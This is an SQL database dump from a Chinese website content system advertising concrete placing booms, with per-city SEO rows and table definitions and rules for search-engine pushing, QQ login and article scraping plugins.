INSERT INTO `ey_weapp_multicity` VALUES ('356', '0', '0', '青海省', '1', '1', '0', 'qinghaisheng', '青海省混凝土布料机厂家', '青海省混凝土布料机价格,青海省混凝土布料机,青海省混凝土布料机厂家', '青海省混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655429823', '1655429823');
INSERT INTO `ey_weapp_multicity` VALUES ('357', '356', '356', '西宁市', '2', '1', '0', 'xining', '西宁液压布料机厂家', '西宁布料机价格,西宁液压布料机,西宁液压布料机厂家', '西宁布料机专业生产厂家联系电话:17858811257', '100', '1655430430', '1655430430');
INSERT INTO `ey_weapp_multicity` VALUES ('358', '356', '356', '海东市', '2', '1', '0', 'haidong', '海东市混凝土布料机厂家', '海东市混凝土布料机价格,海东市混凝土布料机,海东市混凝土布料机厂家', '海东市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655430581', '1655430581');
INSERT INTO `ey_weapp_multicity` VALUES ('359', '0', '0', '内蒙古自治区', '1', '1', '0', 'neimenggu', '内蒙古混凝土布料机厂家', '内蒙古混凝土布料机价格,内蒙古混凝土布料机,内蒙古混凝土布料机厂家', '内蒙古混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655430794', '1655430794');
INSERT INTO `ey_weapp_multicity` VALUES ('360', '359', '359', '呼和浩特市', '2', '1', '0', 'huhehaote', '呼和浩特混凝土布料机厂家', '呼和浩特混凝土布料机价格,呼和浩特混凝土布料机,呼和浩特混凝土布料机厂家', '呼和浩特混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655431592', '1655431592');
INSERT INTO `ey_weapp_multicity` VALUES ('361', '359', '359', '包头市', '2', '1', '0', 'bts', '包头液压布料机厂家', '包头布料机价格,包头液压布料机,包头液压布料机厂家', '包头布料机专业生产厂家联系电话:17858811257', '100', '1655431780', '1655431780');
INSERT INTO `ey_weapp_multicity` VALUES ('362', '359', '359', '乌海市', '2', '1', '0', 'wuhaishi', '乌海液压布料机厂家', '乌海布料机价格,乌海液压布料机,乌海液压布料机厂家', '乌海布料机专业生产厂家联系电话:17858811257', '100', '1655431945', '1655431945');
INSERT INTO `ey_weapp_multicity` VALUES ('363', '359', '359', '赤峰市', '2', '1', '0', 'chifengshi', '赤峰液压布料机厂家', '赤峰布料机价格,赤峰液压布料机,赤峰液压布料机厂家', '赤峰布料机专业生产厂家联系电话:17858811257', '100', '1655432072', '1655432072');
INSERT INTO `ey_weapp_multicity` VALUES ('364', '359', '359', '通辽市', '2', '1', '0', 'tongliao', '通辽市混凝土布料机厂家', '通辽市混凝土布料机价格,通辽市混凝土布料机,通辽市混凝土布料机厂家', '通辽市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655432207', '1655432207');
INSERT INTO `ey_weapp_multicity` VALUES ('365', '359', '359', '鄂尔多斯市', '2', '1', '0', 'eeds', '鄂尔多斯混凝土布料机厂家', '鄂尔多斯混凝土布料机价格,鄂尔多斯混凝土布料机,鄂尔多斯混凝土布料机厂家', '鄂尔多斯混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655432333', '1655432333');
INSERT INTO `ey_weapp_multicity` VALUES ('366', '359', '359', '呼伦贝尔市', '2', '1', '0', 'hnbe', '呼伦贝尔液压布料机厂家', '呼伦贝尔布料机价格,呼伦贝尔液压布料机,呼伦贝尔液压布料机厂家', '呼伦贝尔布料机专业生产厂家联系电话:17858811257', '100', '1655432441', '1655432441');
INSERT INTO `ey_weapp_multicity` VALUES ('367', '359', '359', '巴彦淖尔市', '2', '1', '0', 'bayanzhuoer', '巴彦淖尔混凝土布料机厂家', '巴彦淖尔混凝土布料机价格,巴彦淖尔混凝土布料机,巴彦淖尔混凝土布料机厂家', '巴彦淖尔混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655432575', '1655432575');
INSERT INTO `ey_weapp_multicity` VALUES ('368', '359', '359', '乌兰察布市', '2', '1', '0', 'wlcb', '乌兰察布液压布料机厂家', '乌兰察布布料机价格,乌兰察布液压布料机,乌兰察布液压布料机厂家', '乌兰察布布料机专业生产厂家联系电话:17858811257', '100', '1655433709', '1655433709');
INSERT INTO `ey_weapp_multicity` VALUES ('369', '0', '0', '广西壮族自治区', '1', '1', '0', 'guangxizhuangzu', '广西壮族自治区混凝土布料机厂家', '广西壮族自治区混凝土布料机价格,广西壮族自治区混凝土布料机,广西壮族自治区混凝土布料机厂家', '广西壮族自治区混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655433838', '1655433838');
INSERT INTO `ey_weapp_multicity` VALUES ('370', '369', '369', '南宁市', '2', '1', '0', 'nanling', '南宁市混凝土布料机厂家', '南宁市混凝土布料机价格,南宁市混凝土布料机,南宁市混凝土布料机厂家', '南宁市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655434130', '1655434130');
INSERT INTO `ey_weapp_multicity` VALUES ('371', '369', '369', '柳州市', '2', '1', '0', 'liuzhou', '柳州液压布料机厂家', '柳州布料机价格,柳州液压布料机,柳州液压布料机厂家', '柳州布料机专业生产厂家联系电话:17858811257', '100', '1655434221', '1655434221');
INSERT INTO `ey_weapp_multicity` VALUES ('372', '369', '369', '桂林市', '2', '1', '0', 'guilin', '桂林液压布料机厂家', '桂林布料机价格,桂林液压布料机,桂林液压布料机厂家', '桂林布料机专业生产厂家联系电话:17858811257', '100', '1655434333', '1655434355');
INSERT INTO `ey_weapp_multicity` VALUES ('373', '369', '369', '梧州市', '2', '1', '0', 'wuzhou', '梧州液压布料机厂家', '梧州布料机价格,梧州液压布料机,梧州液压布料机厂家', '梧州布料机专业生产厂家联系电话:17858811257', '100', '1655434664', '1655434664');
INSERT INTO `ey_weapp_multicity` VALUES ('374', '369', '369', '北海市', '2', '1', '0', 'beihai', '北海混凝土布料机厂家', '北海混凝土布料机价格,北海混凝土布料机,北海混凝土布料机厂家', '北海混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655434823', '1655434823');
INSERT INTO `ey_weapp_multicity` VALUES ('375', '369', '369', '防城港市', '2', '1', '0', 'fcgs', '防城港混凝土布料机厂家', '防城港混凝土布料机价格,防城港混凝土布料机,防城港混凝土布料机厂家', '防城港混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655434944', '1655434944');
INSERT INTO `ey_weapp_multicity` VALUES ('376', '369', '369', '钦州市', '2', '1', '0', 'qinzhou', '钦州市液压布料机厂家', '钦州市布料机价格,钦州市液压布料机,钦州市液压布料机厂家', '钦州市布料机专业生产厂家联系电话:17858811257', '100', '1655435039', '1655435039');
INSERT INTO `ey_weapp_multicity` VALUES ('377', '369', '369', '贵港市', '2', '1', '0', 'guigang', '贵港混凝土布料机厂家', '贵港混凝土布料机价格,贵港混凝土布料机,贵港混凝土布料机厂家', '贵港混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655435119', '1655435613');
INSERT INTO `ey_weapp_multicity` VALUES ('378', '369', '369', '玉林市', '2', '1', '0', 'yulin', '玉林混凝土布料机厂家', '玉林混凝土布料机价格,玉林混凝土布料机,玉林混凝土布料机厂家', '玉林混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655435732', '1655435732');
INSERT INTO `ey_weapp_multicity` VALUES ('379', '369', '369', '百色市', '2', '1', '0', 'bss', '百色液压布料机厂家', '百色布料机价格,百色液压布料机,百色液压布料机厂家', '百色布料机专业生产厂家联系电话:17858811257', '100', '1655435799', '1655435799');
INSERT INTO `ey_weapp_multicity` VALUES ('380', '369', '369', '贺州市', '2', '1', '0', 'hezhoushi', '贺州混凝土布料机厂家', '贺州混凝土布料机价格,贺州混凝土布料机,贺州混凝土布料机厂家', '贺州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655435900', '1655435900');
INSERT INTO `ey_weapp_multicity` VALUES ('381', '369', '369', '河池市', '2', '1', '0', 'hechi', '河池液压布料机厂家', '河池布料机价格,河池液压布料机,河池液压布料机厂家', '河池布料机专业生产厂家联系电话:17858811257', '100', '1655436199', '1655436199');
INSERT INTO `ey_weapp_multicity` VALUES ('382', '369', '369', '来宾市', '2', '1', '0', 'laibing', '来宾液压布料机厂家', '来宾布料机价格,来宾液压布料机,来宾液压布料机厂家', '来宾布料机专业生产厂家联系电话:17858811257', '100', '1655442556', '1655442556');
INSERT INTO `ey_weapp_multicity` VALUES ('383', '369', '369', '崇左市', '2', '1', '0', 'chongzuo', '崇左混凝土布料机厂家', '崇左混凝土布料机价格,崇左混凝土布料机,崇左混凝土布料机厂家', '崇左混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655442635', '1655442635');
INSERT INTO `ey_weapp_multicity` VALUES ('384', '0', '0', '西藏自治区', '1', '1', '0', 'xizang', '西藏液压布料机厂家', '西藏布料机价格,西藏液压布料机,西藏液压布料机厂家', '西藏布料机专业生产厂家联系电话:17858811257', '100', '1655442717', '1655442717');
INSERT INTO `ey_weapp_multicity` VALUES ('385', '384', '384', '拉萨市', '2', '1', '0', 'lasa', '拉萨液压布料机厂家', '拉萨布料机价格,拉萨液压布料机,拉萨液压布料机厂家', '拉萨布料机专业生产厂家联系电话:17858811257', '100', '1655443531', '1655443531');
INSERT INTO `ey_weapp_multicity` VALUES ('386', '384', '384', '日喀则市', '2', '1', '0', 'rikaze', '日喀则混凝土布料机厂家', '日喀则混凝土布料机价格,日喀则混凝土布料机,日喀则混凝土布料机厂家', '日喀则混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655443634', '1655443634');
INSERT INTO `ey_weapp_multicity` VALUES ('387', '384', '384', '山南市', '2', '1', '0', 'shannan', '山南液压布料机厂家', '山南布料机价格,山南液压布料机,山南液压布料机厂家', '山南布料机专业生产厂家联系电话:17858811257', '100', '1655443742', '1655443742');
INSERT INTO `ey_weapp_multicity` VALUES ('388', '384', '384', '林芝市', '2', '1', '0', 'linzhi', '林芝液压布料机厂家', '林芝布料机价格,林芝液压布料机,林芝液压布料机厂家', '林芝布料机专业生产厂家联系电话:17858811257', '100', '1655444220', '1655444220');
INSERT INTO `ey_weapp_multicity` VALUES ('389', '384', '384', '昌都市', '2', '1', '0', 'changdu', '昌都混凝土布料机厂家', '昌都混凝土布料机价格,昌都混凝土布料机,昌都混凝土布料机厂家', '昌都混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655444376', '1655444376');
INSERT INTO `ey_weapp_multicity` VALUES ('390', '384', '384', '那曲市', '2', '1', '0', 'naqu', '那曲液压布料机厂家', '那曲布料机价格,那曲液压布料机,那曲液压布料机厂家', '那曲布料机专业生产厂家联系电话:17858811257', '100', '1655444458', '1655444458');
INSERT INTO `ey_weapp_multicity` VALUES ('391', '0', '0', '宁夏回族自治区', '1', '1', '0', 'ningxiahuizu', '宁夏混凝土布料机厂家', '宁夏混凝土布料机价格,宁夏混凝土布料机,宁夏混凝土布料机厂家', '宁夏市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655444592', '1655444592');
INSERT INTO `ey_weapp_multicity` VALUES ('393', '391', '391', '银川市', '2', '1', '0', 'yinchuan', '银川液压布料机厂家', '银川布料机价格,银川液压布料机,银川液压布料机厂家', '银川布料机专业生产厂家联系电话:17858811257', '100', '1655444991', '1655444991');
INSERT INTO `ey_weapp_multicity` VALUES ('394', '391', '391', '石嘴山市', '2', '1', '0', 'shizuishan', '石嘴山混凝土布料机厂家', '石嘴山混凝土布料机价格,石嘴山混凝土布料机,石嘴山混凝土布料机厂家', '石嘴山混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655445081', '1655445081');
INSERT INTO `ey_weapp_multicity` VALUES ('395', '391', '391', '吴忠市', '2', '1', '0', 'wuzhong', '吴忠液压布料机厂家', '吴忠布料机价格,吴忠液压布料机,吴忠液压布料机厂家', '吴忠布料机专业生产厂家联系电话:17858811257', '100', '1655445206', '1655445206');
INSERT INTO `ey_weapp_multicity` VALUES ('396', '391', '391', '固原市', '2', '1', '0', 'guyuan', '固原液压布料机厂家', '固原布料机价格,固原液压布料机,固原液压布料机厂家', '固原布料机专业生产厂家联系电话:17858811257', '100', '1655445291', '1655445291');
INSERT INTO `ey_weapp_multicity` VALUES ('397', '391', '391', '中卫市', '2', '1', '0', 'zhongwei', '中卫混凝土布料机厂家', '中卫混凝土布料机价格,中卫混凝土布料机,中卫混凝土布料机厂家', '中卫混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655445372', '1655445372');
INSERT INTO `ey_weapp_multicity` VALUES ('398', '0', '0', '新疆维吾尔自治区', '1', '1', '0', 'xinjiang', '新疆混凝土布料机厂家', '新疆混凝土布料机价格,新疆混凝土布料机,新疆混凝土布料机厂家', '新疆混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655445482', '1655445482');
INSERT INTO `ey_weapp_multicity` VALUES ('399', '398', '398', '乌鲁木齐', '2', '1', '0', 'wulumuqi', '乌鲁木齐液压布料机厂家', '乌鲁木齐布料机价格,乌鲁木齐液压布料机,乌鲁木齐液压布料机厂家', '乌鲁木齐布料机专业生产厂家联系电话:17858811257', '100', '1655445694', '1655445694');
INSERT INTO `ey_weapp_multicity` VALUES ('400', '398', '398', '克拉玛依', '2', '1', '0', 'kelamayi', '克拉玛依混凝土布料机厂家', '克拉玛依混凝土布料机价格,克拉玛依混凝土布料机,克拉玛依混凝土布料机厂家', '克拉玛依混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655446070', '1655446070');
INSERT INTO `ey_weapp_multicity` VALUES ('401', '398', '398', '吐鲁番', '2', '1', '0', 'tulufan', '吐鲁番液压布料机厂家', '吐鲁番布料机价格,吐鲁番液压布料机,吐鲁番液压布料机厂家', '吐鲁番布料机专业生产厂家联系电话:17858811257', '100', '1655446375', '1655446375');
INSERT INTO `ey_weapp_multicity` VALUES ('402', '398', '398', '哈密市', '2', '1', '0', 'hami', '哈密混凝土布料机厂家', '哈密混凝土布料机价格,哈密混凝土布料机,哈密混凝土布料机厂家', '哈密混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655446477', '1655446477');
INSERT INTO `ey_weapp_multicity` VALUES ('403', '0', '0', '香港', '1', '1', '0', 'hk', '香港混凝土布料机厂家', '香港混凝土布料机价格,香港混凝土布料机,香港混凝土布料机厂家', '香港混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655448070', '1655448070');
-- -----------------------------
-- Table structure for `ey_weapp_picture_cleaning`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_picture_cleaning`;
CREATE TABLE `ey_weapp_picture_cleaning` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`table_of_ontents` varchar(50) DEFAULT '' COMMENT '移动的目录文件夹名称',
`url` varchar(255) DEFAULT '' COMMENT '文件地址',
`status` tinyint(1) DEFAULT '0' COMMENT '状态:0=正常,1=清理',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=786 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_pushall`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_pushall`;
CREATE TABLE `ey_weapp_pushall` (
`aid` int(100) NOT NULL COMMENT '文章ID',
`baidupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '百度推送状态',
`shenmapushzt` int(1) NOT NULL DEFAULT '0' COMMENT '神马推送状态',
`sogoupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '搜狗推送状态',
`toutiaopushzt` int(1) NOT NULL DEFAULT '0' COMMENT '头条推送状态',
PRIMARY KEY (`aid`),
UNIQUE KEY `aid` (`aid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_pushalltag`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_pushalltag`;
CREATE TABLE `ey_weapp_pushalltag` (
`aid` int(100) NOT NULL COMMENT '文章ID',
`baidupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '百度推送状态',
`shenmapushzt` int(1) NOT NULL DEFAULT '0' COMMENT '神马推送状态',
`sogoupushzt` int(1) NOT NULL DEFAULT '0' COMMENT '搜狗推送状态',
`toutiaopushzt` int(1) NOT NULL DEFAULT '0' COMMENT '头条推送状态',
PRIMARY KEY (`aid`),
UNIQUE KEY `aid` (`aid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_qqlogin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_qqlogin`;
CREATE TABLE `ey_weapp_qqlogin` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`openid` varchar(100) NOT NULL DEFAULT '' COMMENT 'openid',
`nickname` varchar(255) NOT NULL DEFAULT '' COMMENT 'QQ昵称',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
`sta` tinyint(1) NOT NULL DEFAULT '0' COMMENT '修改用户名或者绑定已有账号标识,0-未标记,1-已标记',
PRIMARY KEY (`id`),
KEY `openid` (`openid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='qq登陆记录表';
-- -----------------------------
-- Table structure for `ey_weapp_sitecollect`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_sitecollect`;
CREATE TABLE `ey_weapp_sitecollect` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(50) DEFAULT '' COMMENT '任务名称',
`typeid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '采集栏目',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`is_desc` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否倒序采集',
`is_status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '入库状态(1=显示,0=屏蔽(草稿))',
`is_litpic` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否获取第一张图片为封面',
`is_filt_repet` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否过滤重复标题',
`is_local` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '图片是否本地保存',
`filt_iframe` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否过滤Iframe',
`filt_js` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_a` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_style` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_object` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_note` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_table` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_img` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_embed` tinyint(1) NOT NULL DEFAULT '0',
`filt_param` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_div_b` tinyint(1) unsigned NOT NULL DEFAULT '0',
`filt_div_e` tinyint(1) unsigned NOT NULL DEFAULT '0',
`get_style` tinyint(1) unsigned NOT NULL DEFAULT '2' COMMENT '获取方式,1:手工输入,2:批量生成',
`url_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '网址规则',
`min_id` int(6) unsigned NOT NULL DEFAULT '1' COMMENT '最小值页码',
`max_id` int(6) unsigned NOT NULL DEFAULT '0' COMMENT '最大值页码',
`list_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '列表规则',
`a_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '页面链接规则',
`a_involve` varchar(100) NOT NULL DEFAULT '' COMMENT '必须包含',
`a_exclusive` varchar(100) NOT NULL DEFAULT '' COMMENT '不能包含',
`is_list_litpic` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '获取列表缩略图',
`litpic_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '列表缩略图规则',
`is_page` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否文章分页',
`page_a_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '页面正则代码',
`page_list_rule` varchar(255) NOT NULL DEFAULT '' COMMENT '分页正则代码',
`sort_order` int(6) unsigned NOT NULL DEFAULT '100',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态,1:启用,0:锁定',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='文章采集任务列表';
-- -----------------------------
-- Records of `ey_weapp_sitecollect`
-- -----------------------------
INSERT INTO `ey_weapp_sitecollect` VALUES ('1', '示例任务(示例网址:http://www.zzfrjt.com/nba/index_2.html)', '10', '1589179925', '1589179925', '1', '1', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', 'http://www.zzfrjt.com/nba/index_{{id}}.html', '2', '3', '<ul id=\'listNewsTimeLy\' class="listNewsTimeLy">[内容]<div class="pagnation" id="pagnation" style="padding-bottom:30px;">', '<a class="J-share-a" href="[内容]" target="_blank">', '', '', '1', '<img class="animation" src="[内容]"', '0', '', '', '100', '1');
INSERT INTO `ey_weapp_sitecollect` VALUES ('2', '电脑站模板采集', '13', '1589179954', '1589338310', '1', '0', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '', '1', '0', '<ul class="blocks-2 blocks-lg-3 met-pager-ajax met-grid">\r\n[内容]\r\n </ul>\r\n </div>\r\n </div>\r\n </div>\r\n</div>\r\n', '<figure class="widget-header cover"> <a href="[内容]"', '', '', '1', '<img class="cover-image" data-original="[内容]"', '0', '', '', '100', '1');
INSERT INTO `ey_weapp_sitecollect` VALUES ('4', '新闻采集', '24', '1589330098', '1589330918', '1', '1', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', 'https://www.shwlz.com/jzzx.html?pagesize=10&p=3', '1', '0', '<ul class="textlist">[内容]</ul>', '', '', '', '0', '', '0', '', '', '100', '1');
-- -----------------------------
-- Table structure for `ey_weapp_sitecollet_record`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_sitecollet_record`;
CREATE TABLE `ey_weapp_sitecollet_record` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`collectid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '采集列表id',
`title` varchar(255) NOT NULL DEFAULT '' COMMENT '标题',
`url_list` text NOT NULL COMMENT '执行url集合(json格式)',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `collectid` (`collectid`)
) ENGINE=MyISAM AUTO_INCREMENT=46 DEFAULT CHARSET=utf8 COMMENT='文章采集记录列表';
-- -----------------------------
-- Records of `ey_weapp_sitecollet_record`
-- -----------------------------
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('37', '2', '电脑站模板采集', '[\"https:\\/\\/www.eyoucms.com\\/moban\\/\"]', '1589186342', '1589186342');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('38', '3', '案例采集', '[\"https:\\/\\/www.eyoucms.com\\/anli\\/list_4_15.html\",\"https:\\/\\/www.eyoucms.com\\/anli\\/list_4_14.html\"]', '1589188627', '1589188627');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('39', '2', '电脑站模板采集', '[\"https:\\/\\/www.eyoucms.com\\/moban\\/list_3_2.html\"]', '1589251086', '1589251086');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('40', '4', '新闻采集', '[\"https:\\/\\/www.shwlz.com\\/jzzx.html?pagesize=10&p=3\"]', '1589330331', '1589330331');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('41', '4', '新闻采集', '[\"https:\\/\\/www.shwlz.com\\/seo.html?pagesize=10&p=1\"]', '1589330512', '1589330512');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('42', '4', '新闻采集', '[\"https:\\/\\/www.shwlz.com\\/wxyx.html\"]', '1589330764', '1589330764');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('43', '4', '新闻采集', '[\"https:\\/\\/www.shwlz.com\\/xwdt.html\"]', '1589330842', '1589330842');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('44', '4', '新闻采集', '[\"https:\\/\\/www.shwlz.com\\/faq.html?pagesize=20&p=1\"]', '1589330945', '1589330945');
INSERT INTO `ey_weapp_sitecollet_record` VALUES ('45', '2', '电脑站模板采集', '[\"https:\\/\\/www.eyoucms.com\\/moban\\/list_3_21.html\"]', '1589338349', '1589338349');
-- -----------------------------
-- Table structure for `ey_weapp_sitecollet_rule`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_sitecollet_rule`;
CREATE TABLE `ey_weapp_sitecollet_rule` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`collectid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '采集列表id',
`name` varchar(50) NOT NULL DEFAULT '' COMMENT '字段名称',
`title` varchar(50) NOT NULL DEFAULT '' COMMENT '字段别名(中文)',
`rule` varchar(255) NOT NULL DEFAULT '' COMMENT '采集规则',
`origin` varchar(255) NOT NULL DEFAULT '' COMMENT '初始字符串',
`replace` varchar(255) NOT NULL DEFAULT '' COMMENT '替换字符串',
`default` varchar(255) NOT NULL DEFAULT '' COMMENT '默认值(不采集)',
`is_page` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否应用于分页',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `collectid` (`collectid`)
) ENGINE=MyISAM AUTO_INCREMENT=359 DEFAULT CHARSET=utf8 COMMENT='文章采集规则列表';
-- -----------------------------
-- Records of `ey_weapp_sitecollet_rule`
-- -----------------------------
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('37', '1', 'seo_description', 'SEO描述', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('38', '1', 'seo_keywords', 'SEO关键词', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('39', '1', 'seo_title', 'SEO标题', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('40', '1', 'litpic', '缩略图', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('41', '1', 'title', '标题', '<h1><span>[内容]</span></h1>', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('42', '1', 'content', '内容详情', '<div class="J-contain_detail_cnt contain_detail_cnt">[内容]<p>上一篇', '', '', '', '1', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('43', '1', 'add_time', '新增时间', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('44', '1', 'duoxuan', '多选项测试', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('45', '1', 'xialakuang', '下拉框测试', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('46', '1', 'danxuan', '但选项测试', '', '', '', '', '0', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('358', '2', 'users_price', '价格', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('356', '2', 'diy_mbbh', '模板编号', '<dd>模板编号:[内容]</dd>', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('357', '2', 'diy_webewm', '网站二维码', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('355', '2', 'diy_pcys', '电脑站演示地址', '<a id="collect-btn" class="collect-btn nonofavV3" href="[内容]" target="_blank" rel="nofollow">模板演示</a>\r\n', '/plus/', 'https://www.eyoucms.com/plus/', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('354', '2', 'diy_mbys', '手机站演示地址', '<a id="collect-btn" class="collect-btn nonofavV3" href="[内容]" target="_blank" rel="nofollow">模板演示</a>\r\n', '/plus/', 'https://www.eyoucms.com/plus/', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('349', '2', 'seo_keywords', 'SEO关键词', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('352', '2', 'yanse', '颜色', '<dd>模板颜色:[内容]</dd>', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('353', '2', 'sshy', '所属行业', 'class="cjzy">[内容]</a>', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('347', '2', 'litpic', '缩略图', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('348', '2', 'seo_title', 'SEO标题', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('302', '4', 'alwz', '案例网址', '', '', '', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('299', '4', 'seo_keywords', 'SEO关键词', '', '东莞建站公司,企业网站建设,公司网站定制,企业网站优化,网络', '企业网站建设', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('300', '4', 'seo_description', 'SEO描述', '', '', '', '', '0', '1589330918', '1589330918');
